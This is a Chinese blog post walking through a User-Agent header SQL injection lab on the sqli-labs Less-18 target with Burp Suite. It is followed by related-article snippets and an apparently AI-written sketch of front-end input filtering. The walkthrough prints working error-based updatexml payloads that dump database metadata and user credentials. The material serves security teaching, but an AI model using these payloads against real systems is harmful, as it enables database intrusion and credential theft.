SQL注入useragent注入

最新推荐文章于 2025-08-28 16:19:15 发布
原创 最新推荐文章于 2025-08-28 16:19:15 发布 · 910 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#WEB漏洞 #WEB安全 #WEB应用入侵-SQL注入的类型

一、预备知识

二、实验目的

三、实验工具

浏览器、Burpsuite

四、实验环境

客户机一台

五、实验步骤

第一步:查看网页,显示的是访问者的 useragent 信息,所有可以通过 useragent 语句进行注入。

打开 http://www.any.com/sqli/Less-18/,手动设置代理为 127.0.0.1:8080

在这里插入图片描述

第二步:查看当前数据库名称,MySQL版本信息。

1)登录;

Username 输入:admin
Password 输入:admin

2)打开 Burpsuite 工具,刷新浏览器

在这里插入图片描述

3)抓包,将 useragent 添加 payload

123' or updatexml(1,concat(0x7e,database())),0) or '

在这里插入图片描述

4)得到当前的数据库名称:security

在这里插入图片描述

4)得到MySQL版本信息

123' or updatexml(1,concat(0x7e,(version())),0) or '

在这里插入图片描述

5)得到MySQL的版本信息。

在这里插入图片描述

第三步:查看当前数据库所有的表的信息。

1)登录;

Username 输入:admin
Password 输入:admin

2)打开 Burpsuite,刷新浏览器;

3)抓包,并将 useragent 添加 payload。

123' or updatexml(0,concat(0x7e,(select unhex(hex(group_concat(table_name))) from information_schema.tables where table_schema='security')),0) or '

在这里插入图片描述

4)得到所有的表:emailsreferersuagentsusers

在这里插入图片描述

第四步:查看 users 表的所有列信息。

1)登录;

Username 输入:admin
Password 输入:admin

2)打开 Burpsuite,刷新浏览器;

3)抓包,并将 useragent 添加 payload。

123' or updatexml(0,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security')),0) or '

在这里插入图片描述

4)得到所有列:idusernamepassword

在这里插入图片描述

第五步:查看 users 表的所有列的值。

1)登录;

Username 输入:admin
Password 输入:admin

2)打开 Burpsuite,刷新浏览器;

3)抓包,并将 useragent 添加 payload。

123' or updatexml(0,concat(0x7e,(select group_concat(id,username,password) from security.users)),0) or '

在这里插入图片描述

4)得到所有列的值:

在这里插入图片描述


注:如果出现 无法将SQL语句添加到 Burpsuite 中的情况,根据以下的方法解决

解决方法:点击 Burpsuite 中的 第二排的 options 中的其中三项打对勾,如下:

在这里插入图片描述

HTTP请求User-Agent注入、Content-Type注入
墨痕诉清风的博客
02-17 518
User-Agent、Content-Type等只要是http包中存在的都可以进行篡改。在这再说下User-Agent的头注入和Content-Type的头注入
User-Agent手工注入攻击及防御(探测与利用分析)
weixin_46709219的博客
12-19 2494
一)前情提要: 我的一个宿舍友提及,他不能理解为什么一个访问主页的简单的 GET 请求会被 WAF 屏蔽,他被屏蔽的HTTP请求如下: GET / HTTP/1.1 Host: www.example.com Connection: keep-alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Upgrade-Insecure-Requests: 1 User-Agent: Mozi
Web安全:深入理解User-Agent报头注入与防御
最新发布
haishiqiguai的博客,欢迎你的到来,希望你能在此找到汝心中所求
08-28 1537
本篇文章深入讲解了User-Agent报头注入的攻击原理、危害及利用方式,并强调了通过输入验证、输出编码和使用参数化查询等方法来有效防御此类漏洞
时下流行的浏览器User-Agent大全(9038条数据)分为sql版本和excel版本,2018-1-27更新
09-27
自己收集的User-Agent数据,分享给大家使用大概九万条数据,可以用来做采集伪造信息使用
SQL注入12】User-Agent 注入基础及实践(基于BurpSuite工具和Sqli-labs-less18靶机平台)
Fighting_hawk的博客
02-21 5713
1. 了解user-agent注入点; 2. 掌握user-agent注入的方法。
通过User-agent进行SQL注入
04-09 704
声明:本文由Bypass整理并翻译,仅用于安全研究和学习之用。 文章来源:https://hackerone.com/reports/297478 我发现了一个SQL注入漏洞/dashboard/datagov/csv_to_json,可以通过User-AgentHTTP请求头利用它。 我没有从数据库中提取任何数据,我已经使用具有算术运算的sleepSQL查询确认了...
【网安第二章】SQL注入拓展——各种注入方法详细介绍
lyj1597374034的博客
08-28 1021
目录找闭合符1. 描述2. 场景2.1场景一1. 搞清楚闭合符包含哪些符号2. 确定闭合符究竟是什么3.相关关卡2.2 场景二——未知正确输入的情况下1. 具体2.相关关卡确认是否存在注入点1. 描述2. 场景2.1 场景一——GET1. 具体2. 相关关卡2.2 场景二——POST1. 具体2. 相关关卡2.3 场景三——POST sqlmap1. 具体2. 相关关卡2.4 场景四——页面信息提示点1. 具体2. 相关关卡2.5 场景五——头部注入UserAgent)1. 具体2. 相关关卡2.6 场景
sql注入--10http头注入
技术骨干小李的博客
07-27 737
**HTTP(HyperText Transfer Protocol,超文本传输协议)**是访问万维网使用的核心通信协议,也是今天所有Web应用程序使用的通信协议。最初,HTTP只是一个为获取基于文本的静态资源而开发的简单协议,后来人们以各种形式扩展和利用它.使其能够支持如今常见的复杂分布式应用程序。HTTP使用一种用于消息的模型:客户端送出一条请求消息,而后由服务器返回一条响应消息。该协议基本上不需要连接,虽然HTTP使用有状态的TCP协议作为它的传输机制,但每次请求与响应交换都会自动完成,并且可能使用不
17-OWASP top10--SQL注入(二)
XLbb的博客
05-26 1739
地址栏可以看见参数通过burp抓包(参数在请求体里)通过burp抓包(参数写到cookie里)请求头为:Referer、Accept、Cookie等User-Agent注入打开pikachu靶场环境;输入账户admin密码123456--用bp抓包拦截找到登陆地GET请求--发到bp重发器(Repeater)漏洞探测:去除User-Agent:内容,然后输入运行后观察MYSQL语法报错然后发现存在SQL注入漏洞。在User-Agent输入payload :(尝试获取数据库的信息)
10.SQL注入-http header利用案例
愿听风成曲
07-04 281
首先通过登录http头界面,如图所示:登录的信息会被记录到数据库中去,同时使用bp进行抓包分析将抓包的数据发送repeater里面进行调试通过useragent进行注入useragent对应的数据信息删除掉,输入单引号测试被后台执行报错sql语法错误,证明此处存在漏洞useragent信息会被写入数据库中去,所以使用insert注入思路进行测试暴库语句如图所示,数据库被爆出。
SQL注入-HTTP头部注入
LJH1999ZN的博客
02-11 3171
一、http头部注入-User-Agent 1.user-agent 是什么 用户代理(User Agent,简称 UA),是一个特殊字符串头,使得服务器能够识别客户使用的操作系统及版本、CPU 类型、浏览器及版本、浏览器渲染引擎、浏览器语言、浏览器插件等。 2.http头部(user-agent)注入原理 由于后端对user-agent的数据保存到数据中,此时我们可以就可以利用SQL注入。 3.http头部(user-agent)注入的实现 3.1.打开sqlilabs/Less-18/i
SQL注入之User-Agent注入
m0_48520508的博客
07-14 1158
0x00漏洞信息 披露者:harisec 危害程度:高危 漏洞类型sql注入 0x01漏洞介绍 通过访问: https://labs.data.gov/dashboard/datagov/csv_to_json抓包在user-agent头在中进行SQL注入 我没有从数据库中提取任何数据,我已经使用sleep函数 SQL查询确认了该漏洞。该命令与算术操作相结合,将导致服务器响应不同的时间取决于算术运算的结果。 例如,将该值设置: Mozilla/5.0 (Windows NT 6.1; WOW64) App
sql注入进阶/user-agent/基于报错的注入/保姆级教程/一看就会/
ChenD的学习笔记
10-08 1422
基于user-agent 和报错的盲注
HTTP中User-Agent注入
weixin_53519320的博客
10-28 2048
HTTP中User-Agent注入 学习user-agent注入找到靶场来训练一下 user agent是指用户代理,简称 UA。 HTTP中User-Agent注入 insert="INSERTINTO′security′.′uagents′(′uagent′,′ipaddress′,′username′)VALUES(′insert="INSERT INTO'security'.'uagents'('uagent','ip_address','username') VALUES ('insert="I
SQL User-Agent注入详解
永远是少年
08-18 1666
今天继续给大家介绍渗透测试相关知识,本文主要内容是SQLUser-Agent注入详解。 一、SQL User-Agent简介 二、SQL User-Agent靶场简介 三、SQL User-Agent注入实战
sql注入之cookie 注入,user-agent注入
没有故事
02-27 547
BP 抓包,在user- agent 注入,页面没有正确错误回显。页面没有正确错误显示,BP抓包,在抓包内容里面看到输入内容在cookie 里面。注入:cookie:user =1' order by 3#sqlmap :保存文件,参数位置加*或者指定参数-p。抓包后,cookie: user=admin。cookie 身份验证信息。在cookie里面进行注入
通过User-Agent进行SQL注入
richard1230的博客
10-30 794
通过User-Agent进行SQL注入声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。
使用SQLmap进行UA注入(User-Agent注入
zyx_aplomb的博客
08-29 1697
使用sqlmap进行UA注入时的一些关键点
User Agent注入攻击及防御
weixin_33897722的博客
05-24 813
CloudFlare公司经常会收到客户询问为什么他们的一些请求会被CloudFlare WAF屏蔽。最近,一位客户就提出他不能理解为什么一个访问他主页简单的 GET 请求会被 WAF 屏蔽。 下面是被屏蔽的请求: GET / HTTP/1.1 Host: www.example.com Connection: keep-alive Accept: text/html,applicati...
SQL注入防御系统的实现前端界面
04-28
<think>嗯,用户想了解如何实现一个SQL注入防御系统的前端界面。首先,我需要明确前端在防御SQL注入中的角色。虽然主要防御工作在后端,但前端也能通过输入验证和过滤来增强安全性。 首先,输入验证是关键。用户提到的前端需要限制输入类型,比如数字、邮箱等,这可以通过HTML5的输入类型和正则达式实现。例如,使用type="number"或pattern属性来限制格式。但要注意,前端验证容易被绕过,所以必须结合后端验证。 接下来是输入过滤,过滤特殊字符如单引号、分号等。可以通过JavaScript在提交前检查输入内容,并替换或阻止提交。但这里需要考虑用户体验,比如实时提示用户输入非法字符,而不是简单阻止。 然后,错误信息处理。前端不应该显示详细的数据库错误信息,而是返回通用提示,避免泄露信息。这需要和后端配合,确保错误信息不会暴露SQL结构。 另外,UI设计方面,需要明确的输入提示和限制,比如最大长度、格式示例。同时,验证反馈要友好,比如用红色边框或提示文字告知用户问题所在。 还要考虑使用框架或库来简化开发,比如React或Vue的单验证库,提高开发效率和安全性。同时,在提交时增加二次确认或验证码,防止自动化攻击。 不过,用户可能没有意识到前端防御的局限性,所以需要提醒他们后端措施的重要性,比如参数化查询和ORM框架。前端只是第一道防线,不能完全依赖。 最后,生成相关问题时要覆盖前后端协作、具体实现方法、框架使用和绕过防御的手段,帮助用户全面理解。</think>### SQL注入防御系统前端界面实现方法 #### 一、输入验证模块 1. **类型约束**:通过HTML5原生属性限制输入类型 ```html <!-- 数字输入 --> <input type="number" name="user_id" min="1" max="1000"> <!-- 邮箱验证 --> <input type="email" name="user_email" pattern="[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,4}$"> ``` 2. **正则达式过滤**:使用JavaScript进行预验证 ```javascript function sanitizeInput(input) { return input.replace(/[;'"\\<>()]/g, ''); // 过滤特殊字符 } // 提交时验证 form.addEventListener('submit', (e) => { let comment = document.getElementById('comment').value; if (/[\'";]/.test(comment)) { alert("包含非法字符!"); e.preventDefault(); } }); ``` #### 二、动态防御提示 1. **实时输入监控**: ```javascript inputField.addEventListener('input', (e) => { const illegalChars = e.target.value.match(/[;'"\\]/g); if (illegalChars) { showWarning(`检测到危险字符:${illegalChars.join(',')}`); } }); ``` 2. **可视化反馈组件**: ```css /* 危险状态样式 */ .input-danger { border: 2px solid #ff4444; animation: shake 0.5s; } @keyframes shake { 0%,100% {transform: translateX(0)} 25% {transform: translateX(5px)} 75% {transform: translateX(-5px)} } ``` #### 三、安全增强设计 1. **多层验证架构**: ``` 前端验证 --> 代理层过滤 --> 后端验证 --> 数据库预处理 ``` 2. **请求拦截机制**: ```javascript // 使用axios拦截器 axios.interceptors.request.use(config => { if (hasSqlKeywords(config.data)) { return Promise.reject(new Error('检测到潜在攻击')); } return config; }); ``` #### 四、防御效果强化 1. **组合验证策略**: ```javascript const defenseStrategies = [ value => value.length < 100, // 长度限制 value => !/[;'"\\]/.test(value), // 字符过滤 value => isExpectedType(value) // 类型检查 ]; ``` 2. **安全日志记录**: ```javascript function logSuspiciousInput(input) { const logEntry = { timestamp: new Date(), input: input.substring(0, 50), // 记录前50字符 userAgent: navigator.userAgent }; sendToSecurityAnalytics(logEntry); } ``` #### 五、注意事项 1. 前端防御必须与后端参数化查询结合使用[^2] 2. 使用现代框架的安全特性: ```jsx // React示例:受控组件 function SafeInput() { const [value, setValue] = useState(''); const handleChange = (e) => { const filtered = e.target.value.replace(/[^a-zA-Z0-9]/g, ''); setValue(filtered); }; return <input value={value} onChange={handleChange} />; } ``` 3. 建议配合使用Web应用防火墙(WAF)增强防护
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值